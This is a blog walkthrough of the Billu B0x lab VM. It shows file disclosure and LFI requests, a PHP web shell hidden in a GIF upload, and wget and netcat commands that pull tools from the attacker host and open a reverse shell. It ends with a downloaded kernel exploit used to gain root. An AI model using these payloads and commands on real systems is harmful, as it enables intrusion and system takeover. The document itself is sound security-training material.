Mr_H4sh

Infosec, CTF and more

Billu B0x Solution

In this post I’m going to show you how to solve the Billu B0x VM provided by Manish Kishan Tanwar.

You can find the VM on this link

The goal of the VM is to gain root access on the machine. I found 2 ways to get into the machine.

Attacker: 192.168.212.1 / 192.168.212.101
Victim: 192.168.212.102

I run nmap against the victim, and I find the port 22 and 80 open.

Since the port 80 is open, so I visit the URL http://192.168.212.102/ and I find a login form with the following message:

Show me your SQLI skills 
Username:
Password: 

I spend a bit of time trying to get a SQLi, but in the meantime I run dirb and I find some interesting URLs.

-------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May  1 17:16:01 2017
URL_BASE: http://192.168.212.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.212.102/ ----
+ http://192.168.212.102/add (CODE:200|SIZE:307)
+ http://192.168.212.102/c (CODE:200|SIZE:1)
+ http://192.168.212.102/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.212.102/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.212.102/images/
+ http://192.168.212.102/in (CODE:200|SIZE:47559)
+ http://192.168.212.102/index (CODE:200|SIZE:3267)
+ http://192.168.212.102/index.php (CODE:200|SIZE:3267)
+ http://192.168.212.102/panel (CODE:302|SIZE:2469)
+ http://192.168.212.102/server-status (CODE:403|SIZE:296)
+ http://192.168.212.102/show (CODE:200|SIZE:1)
+ http://192.168.212.102/test (CODE:200|SIZE:72)

---- Entering directory: http://192.168.212.102/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon May  1 17:16:24 2017
DOWNLOADED: 4612 - FOUND: 11

I check the URL http://192.168.212.102/test.php, and this is what I get:

'file' parameter is empty. Please provide file path in 'file' parameter

As a GET request the message comes back, so I write a small HTML page to send a POST request to the URL and see what happens:

<form action="http://192.168.212.102/test.php" method="POST">
File Path: <input type="text" name="file"/>
<input type="submit" name="submit" value="submit"/>
</form>

I open the HTML page, add /etc/passwd as file path and submit, and the browser download a passwd file with the following content:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash

I get the source code for various pages (c.php, test.php, panel.php, show.php, add.php).

The file c.php has the following content:

<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }

?>

Unfortunately these credentials can’t allow access on the ssh nor the web application.

I can see from the panel that a user can use 2 functionalities: add and show.

I see that the page show.php has the following source code:

<?php
include('c.php');

if(isset($_POST['continue']))
{
	$run='select * from users ';
	$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {
echo "<table width=90% ><tr><td>ID</td><td>User</td><td>Address</td><td>Image</td></tr>";
 while($row = mysqli_fetch_assoc($result)) 
   {
	   echo '<tr><td>'.$row['id'].'</td><td>'.htmlspecialchars ($row['name'],ENT_COMPAT).'</td><td>'.htmlspecialchars ($row['address'],ENT_COMPAT).'</td><td><img src="uploaded_images/'.htmlspecialchars ($row['image'],ENT_COMPAT).'" height=90px width=100px></td></tr>';
}
   echo "</table>";
}
}

?>

So, using Burp I change the body of the request from POST to GET when visiting http://192.168.212.102/show.php and I see that there are 2 users on the system: “Jack” and “Capitain Barbarossa”, followed by some images.

I check the source code of the file add.php, and I get lucky. This is the source code of the file add.php:

<?php


echo '<form  method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name=image>
	<input type=text name=name value="name">
	<input type=text name=address value="address">
	<input type=text name=id value=1337 >
    <input type="submit" value="upload" name="upload">
</form>';



?>

Unfortunalely this doesn’t work, even if I post to panel.php I need to be logged in.

I get back to the URL scan, I get try again with a bigger wordlist, and this is what I get:

$ dirb http://192.168.212.102 /usr/share/dirb/wordlists/big.txt | tee /tmp/billu_b0x.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May  1 18:20:02 2017
URL_BASE: http://192.168.212.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.212.102/ ----
+ http://192.168.212.102/add (CODE:200|SIZE:307)
+ http://192.168.212.102/c (CODE:200|SIZE:1)
+ http://192.168.212.102/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.212.102/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.212.102/images/
+ http://192.168.212.102/in (CODE:200|SIZE:47559)
+ http://192.168.212.102/index (CODE:200|SIZE:3267)
+ http://192.168.212.102/panel (CODE:302|SIZE:2469)
==> DIRECTORY: http://192.168.212.102/phpmy/
+ http://192.168.212.102/server-status (CODE:403|SIZE:296)
+ http://192.168.212.102/show (CODE:200|SIZE:1)
+ http://192.168.212.102/test (CODE:200|SIZE:72)
==> DIRECTORY: http://192.168.212.102/uploaded_images/

[...]

I see there’s PHPMyAdmin installed on the system, reachable from the URL http://192.168.212.102/phpmy/, also I get more information about the system through the URL http://192.168.212.102/in, which has a page with phpinfo() function showing the information of the system.

This looks a bit more clear. At this point I login to the PHPMyAdmin page and access to the system using the credentials from the c.php: billu:b0x_billu.

I try to get the output of some files or to write a PHP backdoor in one of the folders, but nothing works. Must be that apparmor is running on the system.

I check into the database ica_lab on the table auth, and I get the only user into the DB: biLLu:hEx_it.

Works like magic. I add a new user using the panel, and try to upload a malicious file in order to get a reverse shell.

I prepend the headers of a gif image in a file and append some PHP code to see if the system runs it. This is the content of my malicious image:

$ echo 'FFD8FFEo' | xxd -r -p > my_image.gif
$ echo '<?php phpinfo(); ?>' >> my_image.gif
$ cat my_image.gif
ÿOÿ<?php phpinfo(); ?>

After various attempts, I can’t manage to execute the file in order to execute arbitraty code on the server using the upload functionality. So I move on for now.

I check for a vulnerability for the PHPMyAdmin version installed, and I bump into this exploit https://www.exploit-db.com/exploits/17514/ which is not for the version installed on the VM, but it leads me to the config file of the system.

I visit http://192.168.212.102/phpmy/setup/config.php and I see that this could generate a brand new config.inc.php file. At this point I check through the URL http://192.168.212.102/test.php the content of the file /var/www/phpmy/config.inc.php, and this is the content:

<?php

/* Servers configuration */
$i = 0;

/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;

/* End of servers configuration */

$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';


/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';


?>

I try the credentials root:roottoor to login on PHPMyAdmin as root, but it doesn’t work. So I try those credentials to login through ssh into the system and it works.

$ ssh root@192.168.212.102
Could not create directory '/home/anthony/.ssh'.
The authenticity of host '192.168.212.102 (192.168.212.102)' can't be established.
RSA key fingerprint is 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/anthony/.ssh/known_hosts).
root@192.168.212.102's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue May  2 02:00:22 IST 2017

  System load:  0.06              Processes:           77
  Usage of /:   12.1% of 9.61GB   Users logged in:     0
  Memory usage: 8%                IP address for eth0: 192.168.212.102
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Your Hardware Enablement Stack (HWE) is supported until April 2017.

Last login: Tue May  2 00:53:22 2017 from 192.168.212.1
root@indishell:~# whoami
root
root@indishell:~# id
uid=0(root) gid=0(root) groups=0(root)
root@indishell:~#

Uhm…I check again the vulnhub link of the VM, and this is what it says in the description:

This virtual machine is having medium difficulty level with tricks.

One need to break into VM using web application and from there escalate privileges to gain root access

Ok, I pretend I don’t have root access, and I try harder through the web app.

I spend more time trying to find what I’m missing on the web app and I find out that the parameter load into panel.php has a LFI vulnerability:

POST /panel.php HTTP/1.1
Host: 192.168.212.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Referer: http://192.168.212.102/panel.php
Cookie: PHPSESSID=miq2p5g3srk4p4u6aa55vac9i6
Connection: close
Upgrade-Insecure-Requests: 1

load=../../../etc/passwd&continue=continue


*** OUTPUT ***
[...]

<select name=load>
    <option value="show">Show Users</option>
	<option value="add">Add User</option>
</select> 

 &nbsp<input type=submit name=continue value="continue"></form><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash

This could be good, since I already found a way to upload an image with some PHP code, and this could be the way to execute it.

The following request shows me the output of the phpinfo() function within the file /var/www/uploaded_images/my_image.gif:

POST /panel.php HTTP/1.1
Host: 192.168.212.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Referer: http://192.168.212.102/panel.php
Cookie: PHPSESSID=miq2p5g3srk4p4u6aa55vac9i6
Connection: close
Upgrade-Insecure-Requests: 1

load=../../../var/www/uploaded_images/my_image.gif&continue=continue

So, at this point I write another gif with a PHP backdoor:

$ echo 'FFD8FFEo' | xxd -r -p > shell.gif
$ echo '<?php passthru($_GET['cmd']); ?>' >> shell.gif
$ cat shell.gif
ÿOÿ<?php passthru($_GET[cmd]); ?>

I upload the image and I try again the same request, using the parameter cmd in get request, and this is what I get:

POST /panel.php?cmd=whoami HTTP/1.1
Host: 192.168.212.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Referer: http://192.168.212.102/panel.php
Cookie: PHPSESSID=miq2p5g3srk4p4u6aa55vac9i6
Connection: close
Upgrade-Insecure-Requests: 1

load=../../../var/www/uploaded_images/shell.gif&continue=continue

*** OUTPUT ***
[...]
Welcome to billu b0x <form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form><hr><br><form method=post>

<select name=load>
    <option value="show">Show Users</option>
	<option value="add">Add User</option>
</select> 

 &nbsp<input type=submit name=continue value="continue"></form><br><br>���www-data

Ok, I’m www-data, now I get a reverse shell using the same method and I’m in.

First thing, I see that the version of netcat installed on the machine doesn’t allow execution, so I download it from my machine to the victim’s using the following request:

POST /panel.php?cmd=/usr/bin/wget+http://192.168.212.101/nc+-O+/tmp/nc HTTP/1.1
Host: 192.168.212.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Referer: http://192.168.212.102/panel.php
Cookie: PHPSESSID=miq2p5g3srk4p4u6aa55vac9i6
Connection: close
Upgrade-Insecure-Requests: 1

load=../../../var/www/uploaded_images/shell.gif&continue=continue

I double check that is downloaded and I give execution permissions to the file /tmp/nc.

Once this is done, I put my machine in listening on port 4444 and I use the following request to get a reverse shell:

POST /panel.php?cmd=/tmp/nc+192.168.212.101+4444+-e+/bin/bash HTTP/1.1
Host: 192.168.212.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Referer: http://192.168.212.102/panel.php
Cookie: PHPSESSID=miq2p5g3srk4p4u6aa55vac9i6
Connection: close
Upgrade-Insecure-Requests: 1

load=../../../var/www/uploaded_images/shell.gif&continue=continue

*** OUTPUT ***
# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.212.101] from (UNKNOWN) [192.168.212.102] 55738
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data

Now that I’m in, I need to escalate privileges.

The version of Linux that is running on the machine is 12.04.5 with kernel 3.13.0, which is quite out-of-date:

uname -a
Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.5 LTS"
NAME="Ubuntu"
VERSION="12.04.5 LTS, Precise Pangolin"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu precise (12.04.5 LTS)"
VERSION_ID="12.04"

I download the exploit reachable on the URL https://www.exploit-db.com/exploits/37292/, compile it on the machine and run it:

wget http://192.168.212.101/37292.c
gcc -o exploit 37292.c
ls -la
total 56
drwxrwxrwt  2 root     root      4096 May  2 02:52 .
drwxr-xr-x 22 root     root      4096 Mar 18 23:07 ..
-rw-r--r--  1 www-data www-data  5123 May  2 02:52 37292.c
-rwxr-xr-x  1 www-data www-data 12016 May  2 02:52 exploit
-rwxrwxrwx  1 www-data www-data 26216 May  2 02:40 nc
./exploit
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

This exploit worked, I’m now root (again).

Nice VM, all Web based.

Thank you to Manish Kishan Tanwar for the VM and Vulnhub for hosting it.

Newer >>